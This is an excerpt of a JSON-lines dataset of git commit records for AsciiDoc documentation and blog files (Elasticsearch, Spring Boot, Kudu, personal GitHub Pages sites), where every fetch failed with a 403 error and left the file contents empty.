lasticsearch,LeoYao\/elasticsearch,MetSystem\/elasticsearch,hanswang\/elasticsearch,strapdata\/elassandra,feiqitian\/elasticsearch,masterweb121\/elasticsearch,schonfeld\/elasticsearch,thecocce\/elasticsearch,jbertouch\/elasticsearch,geidies\/elasticsearch,strapdata\/elassandra,JackyMai\/elasticsearch,jw0201\/elastic,heng4fun\/elasticsearch,MisterAndersen\/elasticsearch,vingupta3\/elasticsearch,scorpionvicky\/elasticsearch,nilabhsagar\/elasticsearch,diendt\/elasticsearch,szroland\/elasticsearch,jpountz\/elasticsearch,btiernay\/elasticsearch,mgalushka\/elasticsearch,bawse\/elasticsearch,mcku\/elasticsearch,trangvh\/elasticsearch,huanzhong\/elasticsearch,mbrukman\/elasticsearch,ouyangkongtong\/elasticsearch,strapdata\/elassandra5-rc,geidies\/elasticsearch,rajanm\/elasticsearch,hirdesh2008\/elasticsearch,Asimov4\/elasticsearch,markllama\/elasticsearch,polyfractal\/elasticsearch,jeteve\/elasticsearch,kimimj\/elasticsearch,chrismwendt\/elasticsearch,markwalkom\/elasticsearch,petabytedata\/elasticsearch,sc0ttkclark\/elasticsearch,dylan8902\/elasticsearch,vvcephei\/elasticsearch,clintongormley\/elasticsearch,achow\/elasticsearch,yanjunh\/elasticsearch,kalimatas\/elasticsearch,wayeast\/elasticsearch,AshishThakur\/elasticsearch,huypx1292\/elasticsearch,iacdingping\/elasticsearch,iamjakob\/elasticsearch,wimvds\/elasticsearch,btiernay\/elasticsearch,jpountz\/elasticsearch,pablocastro\/elasticsearch,YosuaMichael\/elasticsearch,pritishppai\/elasticsearch,fekaputra\/elasticsearch,knight1128\/elasticsearch,HarishAtGitHub\/elasticsearch,ThalaivaStars\/OrgRepo1,nomoa\/elasticsearch,mikemccand\/elasticsearch,aglne\/elasticsearch,naveenhooda2000\/elasticsearch,mortonsykes\/elasticsearch,Chhunlong\/elasticsearch,sc0ttkclark\/elasticsearch,petabytedata\/elasticsearch,kcompher\/elasticsearch,Siddartha07\/elasticsearch,JSCooke\/elasticsearch,KimTaehee\/elasticsearch,alexbrasetvik\/elasticsearch,ZTE-PaaS\/elasticsearch,hydro2k\/elasticsearch,yongminxia\/elasticsearch,MjAbuz\/elasticsearch,elasticdog\/elasticsearch,jchampion\/elasticsearch,uschindler\/elasticsearch,jango2015\/elasticsearch,lmtwga\/elasticsearch,jbertouch\/elasticsearch,lightslife\/elasticsearch,martinstuga\/elasticsearch,zhiqinghuang\/elasticsearch,ulkas\/elasticsearch,huanzhong\/elasticsearch,xpandan\/elasticsearch,aglne\/elasticsearch,HonzaKral\/elasticsearch,chirilo\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/standard-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/standard-tokenfilter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d6cdc7521d014d6ed1c3702e1852e046801ede4","subject":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","message":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6640f5f8babb6afc747c5d0d8be2b78abe69294a","subject":"Adding Debezium 1.2.0.Final release announcement","message":"Adding Debezium 1.2.0.Final release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-06-24-debezium-1-2-final-released.adoc","new_file":"blog\/2020-06-24-debezium-1-2-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c86e8e5554d00d263f0ac6f695094bf5ceefe62","subject":"Add guide for a chrooted ergodox ez build","message":"Add guide for a chrooted ergodox ez build\n","repos":"SevereOverfl0w\/.files,SevereOverfl0w\/.files,SevereOverfl0w\/.files","old_file":"docs\/void-chroot-ergodox-ez.adoc","new_file":"docs\/void-chroot-ergodox-ez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SevereOverfl0w\/.files.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ebd9c770eebf5bd7a3338bf7334a9d8de81a129","subject":"JSON-RPC methods have not descriptions","message":"JSON-RPC methods have not descriptions\n\nAdd details for `emerald_listAccounts`, `emerald_updateAccount` and\nothers.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc97c8b41877f8be62e8a555e408505dbe969b83","subject":"Update 2018-03-10-Azure-10.adoc","message":"Update 2018-03-10-Azure-10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-10-Azure-10.adoc","new_file":"_posts\/2018-03-10-Azure-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad3436c065c181e337cdc68ee5f29df7f16536a0","subject":"Update 2018-03-10-Azure-10.adoc","message":"Update 2018-03-10-Azure-10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-10-Azure-10.adoc","new_file":"_posts\/2018-03-10-Azure-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d716be164646f1c33e48494d9efdf1997e4327af","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d349672d98b301994e171dfeefccc67fce888ccd","subject":"Update 2018-05-28-Gas.adoc","message":"Update 2018-05-28-Gas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Gas.adoc","new_file":"_posts\/2018-05-28-Gas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e002f1210469345106c3be4cd393cf7881ecd985","subject":"Update 2015-09-10-.adoc","message":"Update 2015-09-10-.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-10-.adoc","new_file":"_posts\/2015-09-10-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da0ae7a0d65234723289a9d0d25cebbee021b308","subject":"Update 2019-01-13-.adoc","message":"Update 2019-01-13-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-13-.adoc","new_file":"_posts\/2019-01-13-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a17985ce740e09f22f247d6e2d0d38396d9c85f1","subject":"y2b create post 3 QUESTIONS","message":"y2b create post 3 QUESTIONS","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-08-15-3-QUESTIONS.adoc","new_file":"_posts\/2013-08-15-3-QUESTIONS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7618e89534de5f8ead26a98132ad3eaba2150b35","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5ed5ebf8ba8eb87443ca6acf9b54d755869ed74","subject":"Fix \"Query Parameters\" section name","message":"Fix \"Query Parameters\" section name\n\nCloses gh-14600\n","repos":"Buzzardo\/spring-boot,yangdd1205\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,donhuvy\/spring-boot,donhuvy\/spring-boot,donhuvy\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,shakuzen\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,donhuvy\/spring-boot,hello2009chen\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,mdeinum\/spring-boot,chrylis\/spring-boot,shakuzen\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,eddumelendez\/spring-boot,michael-simons\/spring-boot,shakuzen\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,mbenson\/spring-boot,NetoDevel\/spring-boot,aahlenst\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,wilkinsona\/spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,royclarkson\/spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,michael-simons\/spring-boot,vpavic\/spring-boot,ilayaperumalg\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,wilkinsona\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,dreis2211\/spring-boot,NetoDevel\/spring-boot,hello2009chen\/spring-boot,lburgazzoli\/spring-boot,shakuzen\/spring-boot,htynkn\/spring-boot,tiarebalbi\/spring-boot,vpavic\/spring-boot,yangdd1205\/spring-boot,NetoDevel\/spring-boot,mdeinum\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,donhuvy\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,ptahchiev\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,dreis2211\/spring-boot,Buzzardo\/spring-boot,Buzzardo\/spring-boot,rweisleder\/spring-boot,mbenson\/spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,drumonii\/spring-boot,htynkn\/spring-boot,hello2009chen\/spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,ptahchiev\/spring-boot,htynkn\/spring-boot,htynkn\/spring-boot,tiarebalbi\/spring-boot,michael-simons\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,NetoDevel\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,kdvolder\/spring-boot,mdeinum\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,dreis2211\/spring-boot,kdvolder\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,michael-simons\/spring-boot,ilayaperumalg\/spring-boot,hello2009chen\/spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,eddumelendez\/spring-boot,htynkn\/spring-boot,spring-projects\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,shakuzen\/spring-boot,royclarkson\/spring-boot,joshiste\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,drumonii\/spring-boot,jxblum\/spring-boot,royclarkson\/spring-boot,ilayaperumalg\/spring-boot,aahlenst\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot,tiarebalbi\/spring-boot,ptahchiev\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,rweisleder\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,drumonii\/spring-boot,spring-projects\/spring-boot,kdvolder\/spring-boot,spring-projects\/spring-boot,dreis2211\/spring-boot,joshiste\/spring-boot,lburgazzoli\/spring-boot,scottfrederick\/spring-boot,shakuzen\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot","old_file":"spring-boot-project\/spring-boot-actuator-autoconfigure\/src\/main\/asciidoc\/endpoints\/caches.adoc","new_file":"spring-boot-project\/spring-boot-actuator-autoconfigure\/src\/main\/asciidoc\/endpoints\/caches.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lburgazzoli\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"816bc6fd8a8e9a75c4cbd40de9e0d37fac6f7b74","subject":"[docs] add info on rebalancer's --report-only flag","message":"[docs] add info on rebalancer's --report-only flag\n\nDocumented the --report-only command-line flag for the rebalancer\nkudu CLI tool. Documented the --output_replica_distribution_details\nflag as well.\n\nThis is a follow-up to f6668ecac27492cbe6ba7682beff6d347650d689.\n\nChange-Id: I80265eba61c347f70680636f32e0b80ee90ee59f\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11479\nTested-by: Kudu Jenkins\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6461932ebb68c691fb2d874113392103c142e58b","subject":"Update 2018-08-25-remind-me.adoc","message":"Update 2018-08-25-remind-me.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-08-25-remind-me.adoc","new_file":"_posts\/2018-08-25-remind-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7221c981933cad3f14ac3c3640d100e28a989a80","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"453a1f939e5869780dc68bd27a1d55caa18e6688","subject":"Update 2018-10-12-Laravel-D-B.adoc","message":"Update 2018-10-12-Laravel-D-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-12-Laravel-D-B.adoc","new_file":"_posts\/2018-10-12-Laravel-D-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2ceef5e103a4d0e6534e8239293afbf1155e623","subject":"Deleted _posts\/2015-01-31-H24.adoc","message":"Deleted _posts\/2015-01-31-H24.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-01-31-H24.adoc","new_file":"_posts\/2015-01-31-H24.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c0dde3f0312a53de5837fd6daf2f236c8827a4c","subject":"Update 2018-05-28-Gas.adoc","message":"Update 2018-05-28-Gas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Gas.adoc","new_file":"_posts\/2018-05-28-Gas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab6b7425bc485391df7a37262dc94ef304fcceb2","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bac589bcd6483c684b6cf4d02222adf800659d5b","subject":"Update 2016-05-12-ORM-tulza.adoc","message":"Update 2016-05-12-ORM-tulza.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-12-ORM-tulza.adoc","new_file":"_posts\/2016-05-12-ORM-tulza.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b713d51ef2c3237830ae9fb4158939fa3cf4bbe2","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5c67861cef41e89cc5f4a1c33beeb8c943663ac","subject":"travis blog post","message":"travis blog post\n","repos":"juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017","old_file":"_posts\/2017-08-18-Travis_CI.adoc","new_file":"_posts\/2017-08-18-Travis_CI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juhuntenburg\/gsoc2017.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7a3f30b2ce2a6bfda22471314ceb742a8fb988c","subject":"y2b create post PS Vita Import Guide (PlayStation Vita)","message":"y2b create post PS Vita Import Guide (PlayStation Vita)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-31-PS-Vita-Import-Guide-PlayStation-Vita.adoc","new_file":"_posts\/2011-12-31-PS-Vita-Import-Guide-PlayStation-Vita.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c25a3c6674f6870a47076a11803615e2deb82df","subject":"add mvp gen doc","message":"add mvp gen doc\n","repos":"gengjiawen\/AndroidHelper,gengjiawen\/AndroidHelper","old_file":"codegen_util\/mvp_gen\/README.adoc","new_file":"codegen_util\/mvp_gen\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gengjiawen\/AndroidHelper.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2db2a09107a05efe1e0ee78807dee1f122dc028","subject":"add company","message":"add company\n","repos":"clojure\/clojure-site","old_file":"content\/community\/companies.adoc","new_file":"content\/community\/companies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e50390f8ae647830c7809373db9b56369d799ee4","subject":"Publish 2016-11-3-you-know-what.adoc","message":"Publish 2016-11-3-you-know-what.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"2016-11-3-you-know-what.adoc","new_file":"2016-11-3-you-know-what.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c19fd8e593cc9affa58d14bc209e20206e995bd6","subject":"FORGE-2.15.1.Final: Add manual for Cygwin+Wildfly","message":"FORGE-2.15.1.Final: Add manual for Cygwin+Wildfly\n","repos":"agoncal\/docs,addonis1990\/docs,addonis1990\/docs,luiz158\/docs,agoncal\/docs,forge\/docs,luiz158\/docs,forge\/docs","old_file":"get_started\/Cygwin_Manual.asciidoc","new_file":"get_started\/Cygwin_Manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b823f8e58c8889e60104150d8228bb0ef8aca6a6","subject":"y2b create post iPhone 6 - How Thin?","message":"y2b create post iPhone 6 - How Thin?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-04-28-iPhone-6--How-Thin.adoc","new_file":"_posts\/2014-04-28-iPhone-6--How-Thin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78e4135f08ff394ed1051ff3a3dc1c9a06b55ba0","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4408f9438f966a67d9cf91bf33c19a44e78c70","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/11\/12\/deref.adoc","new_file":"content\/news\/2021\/11\/12\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"cd8e518591e48ae2f179f40d8b28a7d7e570da41","subject":"doc(README): add chinese version","message":"doc(README): add chinese version\n","repos":"TheAshwanik\/new,demo-hubpress\/demo-hubpress.github.io,Git-Host\/Git-Host.io,anthonny\/dev.hubpress.io,TheAshwanik\/new,alchapone\/alchapone.github.io,TheAshwanik\/new,alchapone\/alchapone.github.io,lametaweb\/lametaweb.github.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,anthonny\/dev.hubpress.io,TheAshwanik\/new,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,demo-hubpress\/demo-hubpress.github.io,demo-hubpress\/demo-hubpress.github.io,Git-Host\/Git-Host.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,alchapone\/alchapone.github.io,Git-Host\/Git-Host.io,demo-hubpress\/demo-hubpress.github.io","old_file":"docs\/README-zh.adoc","new_file":"docs\/README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo-hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"255148a302f2cd1a93bd811e50f413c40083df08","subject":"Update 2015-07-16-The-Arrival-Part-2.adoc","message":"Update 2015-07-16-The-Arrival-Part-2.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-16-The-Arrival-Part-2.adoc","new_file":"_posts\/2015-07-16-The-Arrival-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c82cdbabde7501866b29afdff2e215a3a05e98ca","subject":"Add files","message":"Add files","repos":"jmunoz298\/atlasti,jmunoz298\/Atlasti7,jmunoz298\/atlasti,jmunoz298\/Atlasti7,jmunoz298\/Atlasti7,jmunoz298\/atlasti","old_file":"01-Introduccion.adoc","new_file":"01-Introduccion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmunoz298\/atlasti.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"254c621f49d7c99ff3a7d8b2a4c96e2c4980506c","subject":"Update 2015-09-21-SQL-review.adoc","message":"Update 2015-09-21-SQL-review.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-SQL-review.adoc","new_file":"_posts\/2015-09-21-SQL-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"928b15862cb66ca10f46a5178028f9218d8cf440","subject":"Update 2016-10-19-algo-10164.adoc","message":"Update 